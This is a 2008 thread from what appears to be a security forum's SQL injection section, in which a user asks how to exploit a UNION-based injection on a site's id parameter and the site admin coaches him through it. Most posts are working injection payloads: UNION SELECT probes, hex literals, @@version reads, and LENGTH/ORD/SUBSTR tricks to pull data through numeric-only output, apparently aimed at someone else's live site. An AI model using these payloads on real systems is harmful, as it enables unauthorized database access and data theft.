 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 625
 Members: 0
 Total: 625
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
good injector SQL? waraxe? |
|
 Posted: Wed Oct 01, 2008 3:00 pm |
 |
|
| kr0k0 |
| Advanced user |
 |
| |
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
 |
|
 |
|
hi all, i have a problem, i'm stuck on a SQL injection but i have not been able to exploit,
| Code: | | index.php?page=p&id=1 1 and 1=0+union select 1,2,3 from information_schema.tables |
it normal, she posted the numbers on the page i view it, i tried to read the column "table_name" with hex() and unhex() but the same problem, it displays nothing and then i tried POST, it not work, the script does not allow POST requests, then i have try to view "@@version" also the same "not working" , someone can help me?
where are u waraxe?  |
|
|
|
|
| Posted: Wed Oct 01, 2008 4:29 pm |
|
|
| MFStyle |
| Regular user |
|
| |
| Joined: Apr 14, 2008 |
| Posts: 24 |
|
|
|
|
|
|
|
| convert(table_name+using+latin1) ? |
|
|
|
|
| Posted: Thu Oct 02, 2008 7:58 am |
|
|
| kr0k0 |
| Advanced user |
|
| |
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| MFStyle wrote: | | convert(table_name+using+latin1) ? |
not working , where are u waraxe.???  |
|
|
|
|
| Posted: Thu Oct 02, 2008 10:56 am |
|
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
So if you try
| Code: |
index.php?page=p&id=-1+UNION+SELECT+111,222,333
|
... then you have visual feedback of "111" and/or "222" and/or "333"? |
|
|
|
|
| Posted: Thu Oct 02, 2008 12:46 pm |
|
|
| kr0k0 |
| Advanced user |
|
| |
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| waraxe thank you for answer, infact i see that the number "222" in several place in the page,just this number, the problem is that i can not read a column. . I tried "POST" and unhex(hex()), but always the same problem, So? |
|
|
|
|
| Posted: Fri Oct 03, 2008 9:24 am |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, and if you try
| Code: |
index.php?page=p&id=-1+UNION+SELECT+1,0x414141424242,3
|
and
| Code: |
index.php?page=p&id=-1+UNION+SELECT+1,@@version,3
|
Dou you get feedback? |
|
|
|
|
| Posted: Sat Oct 04, 2008 4:50 pm |
|
|
| kr0k0 |
| Advanced user |
|
| |
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| Code: | index.php?page=p&id=-1+UNION+SELECT+1,0x414141424242,3
index.php?page=p&id=-1+UNION+SELECT+1,@@version,3 |
the same problem ^^ So? |
|
|
|
|
| Posted: Sat Oct 04, 2008 4:58 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Seems, that you have only numeric feedback. Try to use ORD() and SUBSTR() functions ...
| Code: |
index.php?page=p&id=-1+UNION+SELECT+1,LENGTH(@@version),3
|
| Code: |
index.php?page=p&id=-1+UNION+SELECT+1,ORD(SUBSTR(@@version,1,1)),3
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
